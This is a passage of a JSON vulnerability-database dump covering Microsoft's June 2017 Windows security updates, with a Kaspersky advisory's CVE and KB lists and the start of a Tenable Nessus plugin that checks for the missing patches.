2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2012 \nWindows RT 8.1 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2012 R2 \nWindows Server 2016 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 8.1 for x64-based systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8543](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8543>) \n[CVE-2017-0219](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0219>) \n[CVE-2017-0284](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0284>) \n[CVE-2017-0218](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0218>) \n[CVE-2017-0215](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0215>) \n[CVE-2017-8479](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8479>) \n[CVE-2017-0299](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0299>) \n[CVE-2017-8485](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8485>) \n[CVE-2017-0193](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0193>) \n[CVE-2017-8478](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8478>) \n[CVE-2017-8488](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8488>) \n[CVE-2017-8528](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8528>) \n[CVE-2017-8460](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8460>) \n[CVE-2017-8475](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8475>) \n[CVE-2017-8476](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8476>) \n[CVE-2017-8470](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8470>) \n[CVE-2017-8494](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8494>) \n[CVE-2017-8466](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8466>) \n[CVE-2017-8464](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8464>) \n[CVE-2017-0291](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0291>) \n[CVE-2017-0216](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0216>) \n[CVE-2017-0292](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0292>) \n[CVE-2017-8480](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8480>) \n[CVE-2017-8489](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8489>) \n[CVE-2017-0285](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0285>) \n[CVE-2017-0300](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0300>) \n[CVE-2017-8491](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8491>) \n[CVE-2017-8471](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8471>) \n[CVE-2017-8477](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8477>) \n[CVE-2017-8462](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8462>) \n[CVE-2017-0173](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0173>) \n[CVE-2017-0294](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0294>) \n[CVE-2017-8472](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8472>) \n[CVE-2017-8482](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8482>) \n[CVE-2017-8492](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8492>) \n[CVE-2017-8490](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8490>) \n[CVE-2017-8483](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8483>) \n[CVE-2017-0283](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0283>) \n[CVE-2017-8484](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8484>) \n[CVE-2017-8481](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8481>) \n[CVE-2017-8468](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8468>) \n[CVE-2017-0282](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0282>) \n[CVE-2017-8469](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8469>) \n[CVE-2017-8474](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8474>) \n[CVE-2017-8465](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8465>) \n[CVE-2017-0297](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0297>) \n[CVE-2017-0296](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0296>) \n[CVE-2017-8473](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8473>) \n[CVE-2017-8531](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8531>) \n[CVE-2017-0289](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0289>) \n[CVE-2017-0288](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0288>) \n[CVE-2017-8527](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8527>) \n[CVE-2017-0287](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0287>) \n[CVE-2017-8533](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8533>) \n[CVE-2017-8532](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8532>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Word](<https://threats.kaspersky.com/en/product/Microsoft-Word/>)\n\n### *CVE-IDS*:\n[CVE-2017-8543](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8543>)0.0Unknown \n[CVE-2017-0219](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0219>)0.0Unknown \n[CVE-2017-0284](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0284>)0.0Unknown \n[CVE-2017-0218](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0218>)0.0Unknown \n[CVE-2017-0215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0215>)0.0Unknown \n[CVE-2017-8479](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8479>)0.0Unknown \n[CVE-2017-0299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0299>)0.0Unknown \n[CVE-2017-8485](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8485>)0.0Unknown \n[CVE-2017-0193](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0193>)0.0Unknown \n[CVE-2017-8478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8478>)0.0Unknown \n[CVE-2017-8488](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8488>)0.0Unknown \n[CVE-2017-8528](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8528>)0.0Unknown \n[CVE-2017-8460](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8460>)0.0Unknown \n[CVE-2017-8475](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8475>)0.0Unknown \n[CVE-2017-8476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8476>)0.0Unknown \n[CVE-2017-8470](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8470>)0.0Unknown \n[CVE-2017-8494](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8494>)0.0Unknown \n[CVE-2017-8466](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8466>)0.0Unknown \n[CVE-2017-8464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464>)0.0Unknown \n[CVE-2017-0291](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0291>)0.0Unknown \n[CVE-2017-0216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0216>)0.0Unknown \n[CVE-2017-0292](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0292>)0.0Unknown \n[CVE-2017-8480](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8480>)0.0Unknown \n[CVE-2017-8489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8489>)0.0Unknown \n[CVE-2017-0285](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0285>)0.0Unknown \n[CVE-2017-0300](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0300>)0.0Unknown \n[CVE-2017-8491](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8491>)0.0Unknown \n[CVE-2017-8471](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8471>)0.0Unknown \n[CVE-2017-8477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8477>)0.0Unknown \n[CVE-2017-8462](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8462>)0.0Unknown \n[CVE-2017-0173](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0173>)0.0Unknown \n[CVE-2017-0294](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0294>)0.0Unknown \n[CVE-2017-8472](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8472>)0.0Unknown \n[CVE-2017-8482](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8482>)0.0Unknown \n[CVE-2017-8492](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8492>)0.0Unknown \n[CVE-2017-8490](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8490>)0.0Unknown \n[CVE-2017-8483](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8483>)0.0Unknown \n[CVE-2017-0283](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0283>)0.0Unknown \n[CVE-2017-8484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8484>)0.0Unknown \n[CVE-2017-8481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8481>)0.0Unknown \n[CVE-2017-8468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8468>)0.0Unknown \n[CVE-2017-0282](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0282>)0.0Unknown \n[CVE-2017-8469](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8469>)0.0Unknown \n[CVE-2017-8474](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8474>)0.0Unknown \n[CVE-2017-8465](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8465>)0.0Unknown \n[CVE-2017-0297](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0297>)0.0Unknown \n[CVE-2017-0296](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0296>)0.0Unknown \n[CVE-2017-8473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8473>)0.0Unknown \n[CVE-2017-0287](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0287>)0.0Unknown \n[CVE-2017-0288](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0288>)0.0Unknown \n[CVE-2017-0289](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0289>)0.0Unknown \n[CVE-2017-8527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8527>)0.0Unknown \n[CVE-2017-8531](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8531>)0.0Unknown \n[CVE-2017-8532](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8532>)0.0Unknown \n[CVE-2017-8533](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8533>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4022726](<http://support.microsoft.com/kb/4022726>) \n[4022714](<http://support.microsoft.com/kb/4022714>) \n[4022724](<http://support.microsoft.com/kb/4022724>) \n[4022727](<http://support.microsoft.com/kb/4022727>) \n[4022715](<http://support.microsoft.com/kb/4022715>) \n[4025342](<http://support.microsoft.com/kb/4025342>) \n[4025339](<http://support.microsoft.com/kb/4025339>) \n[4034668](<http://support.microsoft.com/kb/4034668>) \n[4034674](<http://support.microsoft.com/kb/4034674>) \n[4034681](<http://support.microsoft.com/kb/4034681>) \n[4034658](<http://support.microsoft.com/kb/4034658>) \n[4034660](<http://support.microsoft.com/kb/4034660>) \n[4022725](<http://support.microsoft.com/kb/4022725>) \n[4022717](<http://support.microsoft.com/kb/4022717>) \n[4022718](<http://support.microsoft.com/kb/4022718>) \n[4034666](<http://support.microsoft.com/kb/4034666>) \n[4034665](<http://support.microsoft.com/kb/4034665>) \n[4034672](<http://support.microsoft.com/kb/4034672>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 26, "modified": "2020-07-22T00:00:00", "published": "2019-06-13T00:00:00", "id": "KLA11039", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11039", "title": "\r KLA11039Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-09-14T18:30:56", "description": "The remote Windows host is missing multiple security updates. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when \n affected Microsoft browsers improperly handle objects \n in memory. An attacker who successfully exploited the \n vulnerability could obtain information to further \n compromise the user's system. (CVE-2016-3326)\n\n - An information disclosure vulnerability exists when \n the Windows kernel improperly handles objects in memory. \n An attacker who successfully exploited this vulnerability \n could obtain information to further compromise the user's \n system.(CVE-2017-0167)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - A remote code execution vulnerability exists in\n Microsoft Office due to improper validation of\n user-supplied input before loading dynamic link library\n (DLL) files. An unauthenticated, remote attacker can\n exploit this, by convincing a user to open a specially\n crafted file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0260)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document file, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285, CVE-2017-8534)\n\n - Multiple remote code execution vulnerabilities exist in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283, CVE-2017-8528)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted \n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8469,\n CVE-2017-8470, CVE-2017-8471, CVE-2017-8472,\n CVE-2017-8473, CVE-2017-8475, CVE-2017-8476,\n CVE-2017-8477, CVE-2017-8478, CVE-2017-8479,\n CVE-2017-8480, CVE-2017-8481, CVE-2017-8482,\n CVE-2017-8483, CVE-2017-8484, CVE-2017-8488,\n CVE-2017-8489, CVE-2017-8491, CVE-2017-8492)\n\n - A remote code execution vulnerability exists in the way \n JavaScript engines render when handling objects in memory \n in Microsoft browsers. The vulnerability could corrupt \n memory in such a way that an attacker could execute \n arbitrary code in the context of the current user.\n (CVE-2017-8517)\n\n - A remote code execution vulnerability exists when Internet \n Explorer improperly accesses objects in memory. This \n vulnerability could corrupt memory in such a way that an \n attacker could execute arbitrary code in the context of \n the current user. (CVE-2017-8519)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8553, CVE-2017-8554)", "edition": 42, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-14T00:00:00", "title": "Windows 2008 June 2017 Multiple Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0167", "CVE-2017-8471", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-0294", "CVE-2017-8489", "CVE-2016-3326", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8534", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "modified": "2017-06-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUN_WIN2008.NASL", "href": "https://www.tenable.com/plugins/nessus/100786", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100786);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\n \"CVE-2016-3326\",\n \"CVE-2017-0167\",\n \"CVE-2017-0193\",\n \"CVE-2017-0260\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0294\",\n \"CVE-2017-0296\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8469\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8472\",\n \"CVE-2017-8473\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8488\",\n \"CVE-2017-8489\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8517\",\n \"CVE-2017-8519\",\n \"CVE-2017-8527\",\n \"CVE-2017-8528\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8534\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8553\",\n \"CVE-2017-8554\"\n );\n script_bugtraq_id(\n 97473,\n 98810,\n 98818,\n 98819,\n 98820,\n 98821,\n 98822,\n 98824,\n 98826,\n 98837,\n 98839,\n 98842,\n 98845,\n 98847,\n 98848,\n 98849,\n 98851,\n 98852,\n 98853,\n 98854,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98864,\n 98865,\n 98869,\n 98870,\n 98878,\n 98884,\n 98885,\n 98900,\n 98901,\n 98903,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98929,\n 98933,\n 98940,\n 98942,\n 98949\n );\n script_xref(name:\"MSKB\", value:\"3217845\");\n script_xref(name:\"MSFT\", value:\"MS17-3217845\");\n script_xref(name:\"MSKB\", value:\"4018106\");\n script_xref(name:\"MSFT\", value:\"MS17-4018106\");\n script_xref(name:\"MSKB\", value:\"4021903\");\n script_xref(name:\"MSFT\", value:\"MS17-4021903\");\n script_xref(name:\"MSKB\", value:\"4021558\");\n script_xref(name:\"MSFT\", value:\"MS17-4021558\");\n script_xref(name:\"MSKB\", value:\"4021923\");\n script_xref(name:\"MSFT\", value:\"MS17-4021923\");\n script_xref(name:\"MSKB\", value:\"4022008\");\n script_xref(name:\"MSFT\", value:\"MS17-4022008\");\n script_xref(name:\"MSKB\", value:\"4022010\");\n script_xref(name:\"MSFT\", value:\"MS17-4022010\");\n script_xref(name:\"MSKB\", value:\"4022013\");\n script_xref(name:\"MSFT\", value:\"MS17-4022013\");\n script_xref(name:\"MSKB\", value:\"4022883\");\n script_xref(name:\"MSFT\", value:\"MS17-4022883\");\n script_xref(name:\"MSKB\", value:\"4022884\");\n script_xref(name:\"MSFT\", value:\"MS17-4022884\");\n script_xref(name:\"MSKB\", value:\"4022887\");\n script_xref(name:\"MSFT\", value:\"MS17-4022887\");\n script_xref(name:\"MSKB\", value:\"4024402\");\n script_xref(name:\"MSFT\", value:\"MS17-4024402\");\n\n script_name(english:\"Windows 2008 June 2017 Multiple Security Updates\");\n script_summary(english:\"Checks the existence of Windows Server 2008 June 2017 Patches.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing multiple security updates. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when \n affected Microsoft browsers improperly handle objects \n in memory. An attacker who successfully exploited the \n vulnerability could obtain information to further \n compromise the user's system. (CVE-2016-3326)\n\n - An information disclosure vulnerability exists when \n the Windows kernel improperly handles objects in memory. \n An attacker who successfully exploited this vulnerability \n could obtain information to further compromise the user's \n system.(CVE-2017-0167)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - A remote code execution vulnerability exists in\n Microsoft Office due to improper validation of\n user-supplied input before loading dynamic link library\n (DLL) files. An unauthenticated, remote attacker can\n exploit this, by convincing a user to open a specially\n crafted file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0260)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document file, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285, CVE-2017-8534)\n\n - Multiple remote code execution vulnerabilities exist in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283, CVE-2017-8528)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted \n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8469,\n CVE-2017-8470, CVE-2017-8471, CVE-2017-8472,\n CVE-2017-8473, CVE-2017-8475, CVE-2017-8476,\n CVE-2017-8477, CVE-2017-8478, CVE-2017-8479,\n CVE-2017-8480, CVE-2017-8481, CVE-2017-8482,\n CVE-2017-8483, CVE-2017-8484, CVE-2017-8488,\n CVE-2017-8489, CVE-2017-8491, CVE-2017-8492)\n\n - A remote code execution vulnerability exists in the way \n JavaScript engines render when handling objects in memory \n in Microsoft browsers. The vulnerability could corrupt \n memory in such a way that an attacker could execute \n arbitrary code in the context of the current user.\n (CVE-2017-8517)\n\n - A remote code execution vulnerability exists when Internet \n 